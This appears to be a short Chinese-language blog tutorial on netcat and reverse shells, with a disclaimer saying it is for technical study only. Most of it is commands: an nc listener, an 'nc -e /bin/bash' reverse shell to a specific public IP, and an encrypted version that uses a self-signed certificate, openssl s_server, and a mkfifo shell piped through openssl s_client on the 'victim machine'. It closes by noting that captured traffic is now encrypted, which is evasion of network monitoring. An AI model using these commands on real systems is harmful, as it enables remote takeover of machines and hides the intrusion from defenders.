免责声明:本节仅做技术交流与学习...

目录

介绍:

用法:

 未加密--流量抓包

加密:

攻击端

靶机 

抓包分析:

---

介绍:

nc 是一个Linux环境下常用的工具命令，可以用来帮助开发者查询和解决网路问题，通常被认为是 NetCat 工具的缩写，在网络工具中有“瑞士军刀”的美誉。

nc 在Linux环境下常常是自带的，如果你使用的Linux发行版本没有这个工具也可以自行安装，比如在CentOS上的安装命令就是 yum install nc -y，并且这个工具在Windows上也可以直接下载使用，下载页面地址为 netcat，简约而不简单。

---

用法:

nc -lvvp 5566 
nc -e /bin/bash 47.94.236.117 5566  

nc -e cmd ip port 

nc -lvvp port   

https://www.cnblogs.com/someone9/p/8667117.html

linux学习之nc工具操作_慕课手记 

网络工具nc的常见功能和用法-CSDN博客 

---

 未加密--流量抓包

nc -lvvp 5566 
nc -e /bin/bash 47.94.236.117 5566 

 

---

加密:

攻击端

生成自签名证书 :
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes 
--全部回车--(全部默认)


监听指定端口，这里我选择 8888 :
openssl s_server -quiet -key key.pem -cert cert.pem -port 8888 

 

 

---监听---上线---执行命令 

靶机 

在受害机上执行 shell 反弹命令(注意修改 ip 和端口) 
mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 47.94.236.117:8888 > /tmp/s; 

 

抓包分析:

 ---数据都被加密了.

 

---